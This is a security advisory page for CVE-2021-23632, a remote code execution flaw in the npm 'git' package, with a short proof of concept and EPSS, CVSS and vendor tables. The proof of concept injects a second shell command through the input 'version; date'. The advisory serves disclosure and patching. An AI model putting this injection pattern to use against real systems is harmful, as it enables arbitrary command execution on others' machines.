GHSA-9gqr-xp86-f87h · Severity: medium · Ecosystem: npm — Code injection in npm git
All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands.

Steps to Reproduce

1. Create a file named exploit.js with the following content:

```js
var Git = require("git").Git;
var repo = new Git("repo-test");
var user_input = "version; date";
repo.git(user_input, function(err, result) {
  console.log(result);
});
```

2. In the same directory as exploit.js, run `npm install git`.
3. Run exploit.js: `node exploit.js`. You should see the output of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present for this PoC to work.
Conclusion & alert: CVE-2021-23632 is rated High Exploit Risk (68.2/100): CVSS Medium severity, with medium exploitation likelihood (EPSS 2.20%). Core evidence: 1 public exploit reference(s) are indexed (Exploit-DB). Mandatory action: Public exploits are available—assess exposure, apply mitigations, and prioritize patching.
Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.
| EDB-ID | Source | Kind | Published | Link |
|---|---|---|---|---|
| — | nvd_ref | exploit_tag | — | Exploit-DB |
EPSS lead: Daily EPSS estimates relative likelihood of exploitation; percentile ranks this CVE among scored vulnerabilities (higher = more severe relative rank).
| # | Date | Old EPSS score | New EPSS score | Delta (New - Old) |
|---|---|---|---|---|
| 1 | 2026-06-15 | 3.40% | 2.20% | -1.20% |
| 2 | 2026-03-15 | 3.22% | 3.40% | +0.18% |
| 3 | 2025-04-13 | — | 3.22% | — |
Full EPSS history (17 records total)
CVSS metrics for this CVE.
| Base score | Version | Severity | Vector | Exploitability | Impact | Score source |
|---|---|---|---|---|---|---|
| 6.6 | 3.1 | MEDIUM | — | 0.7 | 5.9 | [email protected] |
| 9.8 | 3.1 | CRITICAL | — | 3.9 | 5.9 | [email protected] |
| 7.5 | 2.0 | HIGH | — | 10.0 | 6.4 | [email protected] |
| Vendor | Priority | Summary | Link |
|---|---|---|---|
| ubuntu | medium | CVE-2021-23632 medium priority: Ubuntu including 1 source package (git), 7 status rows across 7 suites (bionic, focal, impish, jammy, trusty, upstream, xenial): not-affected 6, ignored 1. | https://ubuntu.com/security/CVE-2021-23632 |
| Vendor | Product | Version | Raw CPE |
|---|---|---|---|
| git_project | git | <= 0.1.5 | cpe:2.3:a:git_project:git:*:*:*:*:*:node.js:*:* |
| URL | Tags |
|---|---|
| https://snyk.io/vuln/SNYK-JS-GIT-1568518 | Exploit Third Party Advisory |